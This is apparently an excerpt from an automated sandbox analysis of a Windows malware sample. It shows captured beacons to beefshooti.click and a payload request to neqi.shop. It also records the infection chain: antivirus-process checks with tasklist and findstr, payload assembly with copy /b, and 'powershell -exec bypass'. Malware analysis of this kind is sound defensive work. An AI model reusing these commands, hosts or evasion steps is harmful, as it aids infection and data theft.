                                                                                        2024-12-24 07:19:00 UTC15331OUTData Raw: 8d b3 0f ee fe b1 b0 cb f6 fd 84 89 aa f8 52 1f 1e d8 79 09 00 ea 45 2e d8 88 ba 2f 1d 5e e8 1c 2a 5f c3 65 4c 0e da 3d 12 8b ac 0c ee fe 93 b3 7c b1 41 56 82 c8 ea 45 cb 60 49 c6 d3 4a be b1 77 b1 56 81 de c4 f4 26 78 48 00 30 24 65 40 78 89 6a 5a c9 bb b6 0b 5c 10 c4 e6 c4 45 aa 93 12 a0 f8 e6 9f 58 e3 06 6d 7a 8b 95 a7 5a 9e 84 0c bf 04 b4 e9 8b 88 0f ac 6e 5b 74 10 06 5b 36 6d c5 1e d8 9c 84 c2 77 3b 36 0d 5e ef 03 fd 42 ff 6b 8a 09 8a c5 ae c7 3b 2f 9e 0b 6b 05 0e 3d 15 1f e2 9d 93 67 78 41 6b 48 d8 36 92 f6 5c a1 76 e0 af 33 75 89 bc 5a 98 ce 49 af 53 f5 34 2c 5a ab a1 0e 6f 4c a3 e3 d3 6b aa 5f 6e d7 9d f1 0a fa b7 4f 4e 9e d9 76 e9 a1 7d 8c a0 82 57 f3 50 5a db 09 d3 07 71 b1 11 9c 9c f7 e8 4e fd e2 67 67 9e 57 b2 d9 9b 39 8a db 79 96 c1 4d ed 9f
                                                                                        Data Ascii: RyE./^*_eL=|AVE`IJwV&xH0$e@xjZ\EXmzZn[t[6mw;6^Bk;/k=gxAkH6\v3uZIS4,ZoLk_nONv}WPZqNggW9yM
                                                                                        2024-12-24 07:19:02 UTC1132INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:19:02 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=l1t10q1rn4qdq2jj38lj1d8ooa; expires=Sat, 19 Apr 2025 01:05:41 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vObMFRXgZNZo4N%2Fvgv%2BLkoIZt20ZCbN5oxQ3vrZXeN%2BXC243HtH9YbXDGbpr01MgKS4xWbWSORNDUvTkkkwIadiuWySRJFlzNHas4NsZOrTNYv9%2FAhGiFfTWP0yFMRAX7up%2F"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed214cc7b4387-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2460&min_rtt=2458&rtt_var=925&sent=325&recv=602&lost=0&retrans=0&sent_bytes=2843&recv_bytes=581490&delivery_rate=1180274&cwnd=47&unsent_bytes=0&cid=c78635da5a2f44c8&ts=2349&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.649859104.21.18.1854436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:19:04 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 111
                                                                                        Host: beefshooti.click
                                                                                        2024-12-24 07:19:04 UTC111OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6a 4d 77 31 49 45 2d 2d 6c 34 26 6a 3d 35 66 38 33 61 37 35 66 62 37 30 33 33 31 32 39 64 65 34 35 62 34 30 33 32 38 35 61 36 37 32 33 26 68 77 69 64 3d 45 33 46 38 46 33 33 45 41 31 36 44 46 46 44 34 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=jMw1IE--l4&j=5f83a75fb7033129de45b403285a6723&hwid=E3F8F33EA16DFFD400D57F9DDD37BE0C
                                                                                        2024-12-24 07:19:05 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 24 Dec 2024 07:19:04 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=sml48rqdosqnethpq2ic83l6of; expires=Sat, 19 Apr 2025 01:05:43 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q6j7jE2WWxUTheqoCmBlz5V5L92DgUzftYFXndKf2mrRbSK3%2Bowtv7rcyYGkUo0iO6lo%2F09CnUNj%2Bg5kd9lBiig046gBF6nVOr5eemWP5QFX2pksnd%2FrW9gfi%2BRfruhi9jeb"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed22bf97743a5-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1687&rtt_var=644&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1012&delivery_rate=1683967&cwnd=252&unsent_bytes=0&cid=ef88f3850101f1b5&ts=1082&x=0"
                                                                                        2024-12-24 07:19:05 UTC222INData Raw: 64 38 0d 0a 45 48 42 48 54 32 47 67 67 49 57 46 4c 35 72 62 33 69 37 47 75 41 71 4c 63 68 47 64 39 6d 2b 65 52 35 4a 48 61 64 55 71 38 6d 78 4c 43 32 55 36 51 35 71 69 37 66 46 62 36 71 6a 6b 63 75 6e 6b 4a 65 55 58 59 50 54 59 48 50 59 6f 34 68 74 47 70 6b 36 56 42 6d 6b 46 4d 78 4e 4f 30 50 50 74 71 31 76 69 72 2f 77 43 35 4e 35 2b 71 55 67 6a 73 64 51 4b 76 48 32 6a 4f 6b 57 75 43 49 64 4f 4b 6c 49 76 4f 78 58 51 38 37 2f 5a 41 4d 62 30 74 55 4b 76 79 47 6e 71 42 6e 54 74 6e 78 71 75 61 65 45 76 42 71 56 32 33 51 56 2b 42 42 67 73 44 64 44 66 36 65 46 64 78 61 69 32 54 2b 6a 4d 63 76 39 51 50 62 2b 51 47 37 78 39 6f 47 74 4c 73 41 6a 49 58 57 30 74 0d 0a
                                                                                        Data Ascii: d8EHBHT2GggIWFL5rb3i7GuAqLchGd9m+eR5JHadUq8mxLC2U6Q5qi7fFb6qjkcunkJeUXYPTYHPYo4htGpk6VBmkFMxNO0PPtq1vir/wC5N5+qUgjsdQKvH2jOkWuCIdOKlIvOxXQ87/ZAMb0tUKvyGnqBnTtnxquaeEvBqV23QV+BBgsDdDf6eFdxai2T+jMcv9QPb+QG7x9oGtLsAjIXW0t
                                                                                        2024-12-24 07:19:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.649865172.67.169.2054436716C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 07:19:06 UTC199OUTGET /sdgjyut/psh.txt HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Host: neqi.shop
                                                                                        2024-12-24 07:19:10 UTC943INHTTP/1.1 523
                                                                                        Date: Tue, 24 Dec 2024 07:19:10 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 15
                                                                                        Connection: close
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rs%2FlxegdJBdoADuX8P%2FFag1CXL8td3g99t9Qaw7OdWK4eX91yxmnkRJX3oxoyMhlHW3mYInBBByk1QyMmohbDxU4pVirhFDxjvqohcdNZi92G%2BBpvASoOOX7Nns%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        Referrer-Policy: same-origin
                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f6ed23c48e7ef9d-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1882&rtt_var=770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=813&delivery_rate=1551540&cwnd=121&unsent_bytes=0&cid=2d811cb559104e8f&ts=3600&x=0"
                                                                                        2024-12-24 07:19:10 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 33
                                                                                        Data Ascii: error code: 523


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:1
                                                                                        Start time:02:18:03
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\user\Desktop\eMBO6wS1b5.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\eMBO6wS1b5.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'325'507 bytes
                                                                                        MD5 hash:73565A0BCDCB7FF5F9CE005A2530E215
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:02:18:03
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Leu Leu.cmd & Leu.cmd
                                                                                        Imagebase:0x1c0000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:02:18:04
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:02:18:06
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:tasklist
                                                                                        Imagebase:0x1f0000
                                                                                        File size:79'360 bytes
                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:02:18:06
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:findstr /I "opssvc wrsa"
                                                                                        Imagebase:0x240000
                                                                                        File size:29'696 bytes
                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:02:18:07
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:tasklist
                                                                                        Imagebase:0x1f0000
                                                                                        File size:79'360 bytes
                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:02:18:07
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                        Imagebase:0x240000
                                                                                        File size:29'696 bytes
                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:02:18:08
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:cmd /c md 801291
                                                                                        Imagebase:0x1c0000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:02:18:08
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:extrac32 /Y /E Array
                                                                                        Imagebase:0x3f0000
                                                                                        File size:29'184 bytes
                                                                                        MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:02:18:09
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:findstr /V "Serve" Ltd
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:29'696 bytes
                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:02:18:09
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:cmd /c copy /b ..\Bumper + ..\Specialist + ..\Bind + ..\Intended + ..\Francisco + ..\Recent f
                                                                                        Imagebase:0x1c0000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:02:18:09
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\801291\Historic.com
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:Historic.com f
                                                                                        Imagebase:0x560000
                                                                                        File size:947'288 bytes
                                                                                        MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:02:18:09
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\choice.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:choice /d y /t 5
                                                                                        Imagebase:0x440000
                                                                                        File size:28'160 bytes
                                                                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:28
                                                                                        Start time:02:19:09
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:powershell -exec bypass error code: 523
                                                                                        Imagebase:0x270000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:29
                                                                                        Start time:02:19:09
                                                                                        Start date:24/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:17.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:21%
                                                                                          Total number of Nodes:1482
                                                                                          Total number of Limit Nodes:27
                                                                                          execution_graph 4201 402fc0 4202 401446 18 API calls 4201->4202 4203 402fc7 4202->4203 4204 401a13 4203->4204 4205 403017 4203->4205 4206 40300a 4203->4206 4208 406831 18 API calls 4205->4208 4207 401446 18 API calls 4206->4207 4207->4204 4208->4204 4209 4023c1 4210 40145c 18 API calls 4209->4210 4211 4023c8 4210->4211 4214 407296 4211->4214 4217 406efe CreateFileW 4214->4217 4218 406f30 4217->4218 4219 406f4a ReadFile 4217->4219 4220 4062cf 11 API calls 4218->4220 4221 4023d6 4219->4221 4224 406fb0 4219->4224 4220->4221 4222 406fc7 ReadFile lstrcpynA lstrcmpA 4222->4224 4225 40700e SetFilePointer ReadFile 4222->4225 4223 40720f CloseHandle 4223->4221 4224->4221 4224->4222 4224->4223 4226 407009 4224->4226 4225->4223 4227 4070d4 ReadFile 4225->4227 4226->4223 4228 407164 4227->4228 4228->4226 4228->4227 4229 40718b SetFilePointer GlobalAlloc ReadFile 4228->4229 4230 4071eb lstrcpynW GlobalFree 4229->4230 4231 4071cf 4229->4231 4230->4223 4231->4230 4231->4231 4232 401cc3 4233 40145c 18 API calls 4232->4233 4234 401cca lstrlenW 4233->4234 4235 4030dc 4234->4235 4236 4030e3 4235->4236 4238 405f7d wsprintfW 4235->4238 4238->4236 4239 401c46 4240 40145c 18 API calls 4239->4240 4241 401c4c 4240->4241 4242 4062cf 11 API calls 4241->4242 4243 401c59 4242->4243 4244 406cc7 81 API calls 4243->4244 4245 401c64 4244->4245 4246 403049 4247 401446 18 API calls 4246->4247 4248 403050 4247->4248 4249 406831 18 API calls 4248->4249 4250 401a13 4248->4250 4249->4250 4251 40204a 4252 401446 18 API calls 4251->4252 4253 402051 IsWindow 4252->4253 4254 4018d3 4253->4254 4255 40324c 4256 403277 4255->4256 4257 40325e SetTimer 4255->4257 4258 4032cc 4256->4258 4259 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4256->4259 4257->4256 4259->4258 4260 4022cc 4261 40145c 18 API calls 4260->4261 4262 4022d3 4261->4262 4263 406301 2 API calls 4262->4263 4264 4022d9 4263->4264 4266 4022e8 4264->4266 4269 405f7d wsprintfW 4264->4269 4267 4030e3 4266->4267 4270 405f7d wsprintfW 4266->4270 4269->4266 4270->4267 4271 4030cf 4272 40145c 18 API calls 4271->4272 4273 4030d6 4272->4273 4275 4030dc 4273->4275 4278 4063d8 GlobalAlloc lstrlenW 4273->4278 4276 4030e3 4275->4276 4305 405f7d wsprintfW 4275->4305 4279 406460 4278->4279 4280 40640e 4278->4280 4279->4275 4281 40643b GetVersionExW 4280->4281 4306 406057 CharUpperW 4280->4306 4281->4279 4282 40646a 4281->4282 4283 406490 LoadLibraryA 4282->4283 4284 406479 4282->4284 4283->4279 4287 4064ae GetProcAddress GetProcAddress GetProcAddress 4283->4287 4284->4279 4286 4065b1 GlobalFree 4284->4286 4288 4065c7 LoadLibraryA 4286->4288 4289 406709 FreeLibrary 4286->4289 4290 406621 4287->4290 4294 4064d6 4287->4294 4288->4279 4292 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4288->4292 4289->4279 4291 40667d FreeLibrary 4290->4291 4293 406656 4290->4293 4291->4293 4292->4290 4297 406716 4293->4297 4302 4066b1 lstrcmpW 4293->4302 4303 4066e2 CloseHandle 4293->4303 4304 406700 CloseHandle 4293->4304 4294->4290 4295 406516 4294->4295 4296 4064fa FreeLibrary GlobalFree 4294->4296 4295->4286 4298 406528 lstrcpyW OpenProcess 4295->4298 4300 40657b CloseHandle CharUpperW lstrcmpW 4295->4300 4296->4279 4299 40671b CloseHandle FreeLibrary 4297->4299 4298->4295 4298->4300 4301 406730 CloseHandle 4299->4301 4300->4290 4300->4295 4301->4299 4302->4293 4302->4301 4303->4293 4304->4289 4305->4276 4306->4280 4307 4044d1 4308 40450b 4307->4308 4309 40453e 4307->4309 4375 405cb0 GetDlgItemTextW 4308->4375 4310 40454b GetDlgItem GetAsyncKeyState 4309->4310 4314 4045dd 4309->4314 4312 40456a GetDlgItem 4310->4312 4325 404588 4310->4325 4317 403d6b 19 API calls 4312->4317 4313 4046c9 4373 40485f 4313->4373 4377 405cb0 GetDlgItemTextW 4313->4377 4314->4313 4322 406831 18 API calls 4314->4322 4314->4373 4315 404516 4316 406064 5 API calls 4315->4316 4318 40451c 4316->4318 4320 40457d ShowWindow 4317->4320 4321 403ea0 5 API calls 4318->4321 4320->4325 4326 404521 GetDlgItem 4321->4326 4327 40465b SHBrowseForFolderW 4322->4327 4323 4046f5 4328 4067aa 18 API calls 4323->4328 4324 403df6 8 API calls 4329 404873 4324->4329 4330 4045a5 SetWindowTextW 4325->4330 4334 405d85 4 API calls 4325->4334 4331 40452f IsDlgButtonChecked 4326->4331 4326->4373 4327->4313 4333 404673 CoTaskMemFree 4327->4333 4338 4046fb 4328->4338 4332 403d6b 19 API calls 4330->4332 4331->4309 4336 4045c3 4332->4336 4337 40674e 3 API calls 4333->4337 4335 40459b 4334->4335 4335->4330 4342 40674e 3 API calls 4335->4342 4339 403d6b 19 API calls 4336->4339 4340 404680 4337->4340 4378 406035 lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 